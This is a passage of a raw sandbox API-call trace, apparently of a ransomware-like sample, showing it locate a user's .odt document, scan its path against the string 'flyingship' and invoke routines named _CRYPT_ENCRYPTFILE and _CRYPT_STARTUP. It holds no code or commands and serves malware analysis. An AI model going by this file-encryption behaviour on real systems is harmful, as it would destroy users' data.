hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.975] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0178.975] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.975] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0178.975] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.975] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0178.975] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.976] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0178.976] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.976] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x4fe3fc70, ftLastWriteTime.dwHighDateTime=0x1d5e5cf, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hiVdX.odt", cAlternateFileName="")) returned 0x90add8 [0179.005] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x4fe3fc70, ftLastWriteTime.dwHighDateTime=0x1d5e5cf, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hiVdX.odt", cAlternateFileName="")) returned 0x90add8 [0179.005] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.006] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hLGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qRNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RNAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hM\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hiVdX.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.008] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.008] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.008] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.008] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.008] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.008] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.008] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.008] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.008] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x4fe3fc70, ftLastWriteTime.dwHighDateTime=0x1d5e5cf, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="hiVdX.odt", cAlternateFileName="")) returned 0x90af58 [0179.009] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.009] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: 